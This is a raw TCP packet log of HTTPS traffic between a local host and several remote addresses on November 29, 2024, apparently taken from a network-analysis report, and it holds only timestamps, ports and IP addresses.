Nov 29, 2024 12:28:16.821387053 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.821504116 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.821510077 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.821522951 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.821538925 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.821547031 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.821829081 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.821835995 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.832932949 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.832992077 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.832998037 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.833142996 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.833240032 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.833245993 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.833257914 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.833264112 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.833570004 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.833610058 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.833616018 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.844455957 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.844559908 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.844566107 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.844662905 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.844685078 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.844691038 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.844702005 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.844711065 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.844959021 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.844974995 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.844988108 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.859819889 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.859842062 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.859848022 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.860039949 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.860045910 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.860045910 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.860052109 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.860059023 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.860352039 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.860358000 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.860368967 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.872277975 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.872385979 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.872457981 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.872463942 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.872494936 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.872580051 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.872586012 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.872600079 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.872644901 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.872872114 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.872878075 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.878081083 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.878087997 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.878098965 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.878252029 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.878257036 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.878258944 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.878264904 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.878271103 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.878557920 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.878563881 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.878576040 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.889564037 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.889605999 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.889612913 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.889688969 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.889736891 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.889744997 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.889750957 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.889776945 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.890018940 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.890024900 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.890031099 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.901556969 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.901588917 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.901604891 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.901700974 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.901717901 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.901784897 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.901809931 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.901845932 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.901886940 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.901897907 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.901905060 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.927423954 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.927592993 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:16.928890944 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:16.960886955 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:17.017301083 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:17.177922964 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.207448959 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:17.207586050 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:17.350872040 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.354971886 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.355004072 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.355215073 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.355237007 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.355267048 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.355333090 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:17.355791092 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.355897903 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.355905056 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.356014967 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.356020927 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.356033087 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.356040001 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.356391907 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.356396914 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.356406927 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.356411934 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.356421947 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.356426001 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.356852055 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:17.385533094 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:17.395052910 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:17.541135073 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:17.578432083 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:17.580956936 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:17.581239939 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:17.712980986 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.730108023 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.735714912 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.735991955 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.736013889 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:17.736102104 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.736109018 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.736219883 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.736227036 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.736232042 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:17.747575045 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:18.085932970 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.090511084 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.090630054 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.090709925 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.090718031 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.090815067 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.090827942 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.091058969 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:18.116815090 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:18.304194927 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:18.451507092 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.637339115 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.642723083 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.643131971 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:18.643734932 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.643860102 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.643871069 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.643935919 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.644015074 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.644061089 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.644073963 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.644085884 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.645169973 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.645183086 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.645409107 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.645555973 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.645719051 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.645730972 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.645740032 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:18.647177935 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:18.673552990 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:19.001080990 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:19.645349026 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:19.647201061 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:19.648335934 CET	62898	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:19.649123907 CET	62898	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:19.978672028 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:19.979144096 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:19.979880095 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:19.980732918 CET	443	58266	162.159.61.3	192.168.2.8
Nov 29, 2024 12:28:19.981142044 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:19.981544018 CET	58266	443	192.168.2.8	162.159.61.3
Nov 29, 2024 12:28:19.981861115 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:19.982213974 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:19.982414961 CET	443	62898	172.64.41.3	192.168.2.8
Nov 29, 2024 12:28:19.983063936 CET	62898	443	192.168.2.8	172.64.41.3
Nov 29, 2024 12:28:27.279237986 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:27.618401051 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:27.623404026 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:27.623441935 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:27.623532057 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:27.623716116 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:27.630099058 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:27.963207960 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:27.969547033 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:27.969558954 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:27.969633102 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:27.970227003 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:27.978682995 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:28.312235117 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:28.317203999 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:28.317292929 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:28.317409992 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:28.317534924 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:28.325871944 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:28.659307003 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:28.665740013 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:28.665792942 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:28.665802956 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:28.666233063 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:28.673252106 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:29.007498980 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:29.013155937 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:29.013216019 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:29.013274908 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:29.013504982 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:29.023006916 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:29.356524944 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:29.362066984 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:29.362138987 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:29.362149954 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:29.362607956 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:29.370562077 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:29.705034971 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:29.711102962 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:29.711141109 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:29.711200953 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:29.711415052 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:29.718027115 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:30.051186085 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:30.055838108 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:30.055860043 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:30.055957079 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:30.056246996 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:30.063997030 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:30.397236109 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:30.403862000 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:30.403903961 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:30.403970957 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:30.404247999 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:30.413290977 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:30.746578932 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:30.752923012 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:30.752966881 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:30.753052950 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:30.753591061 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:30.761436939 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:31.095148087 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:31.100711107 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:31.100725889 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:31.100753069 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:31.101093054 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:31.108494043 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:31.442065001 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:31.447021008 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:31.447042942 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:31.447151899 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:31.447408915 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:31.456624985 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:31.790123940 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:31.795768023 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:31.795795918 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:31.795834064 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:31.796272039 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:31.805139065 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:32.138643026 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:32.143382072 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:32.143444061 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:32.143522978 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:32.143693924 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:32.150214911 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:32.493377924 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:32.499718904 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:32.499736071 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:32.499753952 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:32.500060081 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:32.508393049 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:32.841775894 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:32.847290993 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:32.847405910 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:32.847502947 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:32.847610950 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:32.857023001 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:33.190551996 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:33.197778940 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:33.197793007 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:33.197804928 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:33.198385954 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:33.205234051 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:33.538486004 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:33.543040037 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:33.543051958 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:33.543138981 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:33.543538094 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:33.550595045 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:34.066435099 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:34.081800938 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:34.081842899 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:34.081876040 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:34.081904888 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:34.082256079 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:34.092322111 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:34.390084028 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:34.390352011 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:34.400108099 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:34.420825005 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:34.425662041 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:34.425934076 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:34.432277918 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:34.432356119 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:34.432462931 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:34.432883978 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:34.442931890 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:34.777492046 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:34.783329010 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:34.783349037 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:34.783438921 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:34.783610106 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:34.797044039 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:35.130386114 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:35.136148930 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:35.136159897 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:35.136765957 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:35.137415886 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:35.144069910 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:35.480995893 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:35.488421917 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:35.488539934 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:35.488553047 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:35.488784075 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:35.501250982 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:35.835270882 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:35.841362953 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:35.841403008 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:35.841490984 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:35.841757059 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:35.848346949 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:36.181622982 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:36.188281059 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:36.188297987 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:36.188318968 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:36.188714981 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:36.208209038 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:36.541668892 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:36.547729015 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:36.547786951 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:36.547858953 CET	443	62648	23.209.72.43	192.168.2.8
Nov 29, 2024 12:28:36.548047066 CET	62648	443	192.168.2.8	23.209.72.43
Nov 29, 2024 12:28:36.555613041 CET	62648	443	192.168.2.8	23.209.72.43
